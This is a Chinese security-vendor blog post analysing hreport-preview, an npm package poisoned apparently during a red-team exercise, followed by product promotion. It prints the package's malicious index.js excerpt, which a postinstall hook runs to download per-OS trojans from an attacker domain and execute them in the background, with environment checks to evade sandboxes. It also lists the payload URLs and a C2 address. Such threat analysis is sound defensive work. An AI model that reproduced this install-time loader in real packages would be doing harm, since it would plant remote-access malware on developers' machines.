中路对线发现正在攻防演练中投毒的红队大佬

背景

2023年8月14日晚,墨菲安全实验室发布《首起针对国内金融企业的开源组件投毒攻击事件》NPM投毒事件分析文章,紧接着我们在8月17日监控到一个新的npm投毒组件包 hreport-preview,该投毒组件用来下载木马文件的域名地址竟然是 img.murphysec-nb.love(如下图1),且该域名注册时间就是8月14号,投毒者使用的注册邮箱同样是hotmail临时注册的邮箱,很显然大概是上次被我们公开投毒行为的攻击者正在火速赶往中路与我们对线,大哥,速度要不要这么快 -_-!

图1:whois查询
图1:whois查询

当天中午,我们还收到位于大洋彼岸漂亮国科罗拉多州、同样关注此事的软件供应链安全创业公司phylum.io  CTO Louis来信(见图2),询问该投毒组件是否是我们所为,很是尴尬。

图2:phylum来信询问投毒包情况
图2:phylum来信询问投毒包情况

投毒事件分析

8月17日上午7点,墨菲安全实验室监控到用户 rowebrighttix(邮箱:Rowe_Brighttix@hotmail.com)向NPM上传了携带远控木马的NPM组件包 hreport-preview(见图3)。

图3: NPM仓库 hreport-preview 组件包
图3: NPM仓库 hreport-preview 组件包

Readme中标题为Integrate common functions(集成公共功能) ,而下方列举的常用函数名来自于一篇中文文章(见图4),因此投毒者大概率有中文背景。

图4:《56个JavaScript 实用工具函数助你提升开发效率!》文章中提及相关函数名
图4:《56个JavaScript 实用工具函数助你提升开发效率!》文章中提及相关函数名

代码分析

当用户安装组件包时会执行 package.json 中的 postinstall 语句 node index.js,进而针对Windows/Mac/Linux系统分别从以下网址下载恶意木马,该木马会与投毒者的C2服务器(如:152.195.38.76)建立远程连接,进而执行恶意命令、上传/下载文件等操作,疑似被攻防演练的红队所利用:

  • https://img.murphysec-nb.love/w_x32.exe
  • https://img.murphysec-nb.love/m_arm
  • https://img.murphysec-nb.love/l_x64
//index.js 下载恶意木马
//......

function check(){
    (async () => {
        const result = await getip();
        if (result){
            let status = false;
            let donwoload = ""
            const platform = os.platform();
            const arch = os.arch();

            if (platform === 'win32') {

                if (uptimeMinutes.toFixed(2) > 10){
                    donwoload="https://img.murphysec-nb.love/"+"w_"+arch+".exe"
                    status = true
                }

            } else if (platform === 'darwin') {

                if (uptimeMinutes.toFixed(2) > 10){
                    donwoload="https://img.murphysec-nb.love/"+"m_"+arch
                    status = true
                }
            } else if (platform === 'linux') {

                donwoload="https://img.murphysec-nb.love/"+"l_"+arch
                await (async () => {
                    const result = await checkCgroup();
                    if (result) {
                        status = true
                    } else {
                        if (uptimeMinutes.toFixed(2) > 10){
                            status = true
                        }
                    }
                })();
            } else {
                return

            }

            if(status) {

                await (async () => {
                    const result = await downloadAndSaveFile(donwoload);
                    if (result !=null){
                        if (platform === 'linux' ||platform === 'darwin' ){
                            addExecutablePermission(result)
                        }
                        runInBackground(result)

                    }

                })();
            }else {
                process.exit(0);
            }
        }
    })();

}

IOC

中路对线发现正在攻防演练中投毒的红队大佬

参考链接

排查工具及投毒情报

墨菲安全提供产品可实时拦截针对开源组件的投毒

墨菲安全的私有源网关产品可对npm、pip、maven等中央仓库的投毒事件进行实时的检测和拦截,同时支持对高危漏洞实现基线管理,目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。

墨菲安全提供实时的开源组件投毒情报预警可订阅

墨菲安全0day漏洞及投毒情报覆盖最新的0day、1day及投毒情报预警,所有情报经过严格的安全专家研判,保障企业获取的第一手的高质量漏洞及投毒情报,更有比CVE漏洞库多25+额外的详细分析字段,目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。


以上功能企业可通过以下方式申请试用:

一、长按二维码申请:

中路对线发现正在攻防演练中投毒的红队大佬

二、访问申请链接:

https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe

(0)
上一篇 2023年8月11日 下午7:51
下一篇 2023年8月18日 下午3:44

相关推荐

  • 开发者警惕:恶意的Rust库被发现将操作系统信息传输到Telegram频道

    再次表明开发者仍然是软件供应链攻击的目标,一些恶意包在Rust编程语言的crate注册表上被发现。 据上周发布的一份报告称,这些库是由一个名为”amaperf”的用户在2023年8月14日至16日期间上传的。这些包的名称如下:postgress、if-cfg、xrvrv、serd、oncecell、lazystatic和envlogg…

    2023年8月30日
    0
  • CrowdStrike的报告显示身份攻击事件有所增加

    随着业界日益增长的安全担忧,CrowdStrike的2023年报告显示了针对云的基于身份的网络入侵攻击的增长。 CrowdStrike宣布发布了其2023年的CrowdStrike威胁狩猎报告,其中揭示了基于身份入侵的大幅增加。这些报告涵盖了CrowdStrike的精英威胁猎人和情报分析师所观察到的攻击趋势和“对手手法”。 报告显示,针对云的更为复杂的网络攻…

    2023年8月11日
    0
  • 近期大型攻防演练观感及未来攻防趋势判断

    先说结论 今年大型攻防演练的观感: 1. 大量的国产商业软件供应链厂商的大量商业软件0day被用来攻击(以安全产品、OA、cms、办公软件为主) 2. 社工+钓鱼又玩出了新花样(红队这帮人估计去电诈团队培训回来的?) 3. 开源软件的Nday/0day漏洞及投毒仍然很实用(更多是Nday漏洞有更成熟的利用工具用来打点和内网渗透)未来攻防趋势判断: 1. 未来…

    2023年8月21日
    0
  • OWASP揭示软件供应链安全存在严重漏洞

    SBOM(软件构建物料清单)还不足够:开发人员需要通过使用二进制源验证的过程深入了解软件的构建方式。 美国黑帽 – 拉斯维加斯 – 8月9日星期三,开源OWASP的依赖检查项目的创始人和负责人提出了一种解决软件供应链安全问题的方法,使用了一种名为二进制源验证的新颖过程。 长期从事软件开发的ServiceNow首席工程师和OWASP专家…

    2023年8月10日
    0
  • MOVEit 黑客针对软件供应链的攻击以及带给我们的教训

    当像2023年的MOVEit黑客攻击这样的网络攻击成为全球新闻头条时,人们往往关注受影响的组织名称或受影响的人数。虽然这种关注是可以理解的,但对类似MOVEit攻击中发生的事情进行适当分析对于制定具体的网络安全措施以防止类似事件发生是有用的。 本文概述了MOVEit黑客攻击,并旨在为您的业务提供一些重要的可操作性结论。 什么是MOVEit黑客攻击? 2023…

    2023年8月24日
    0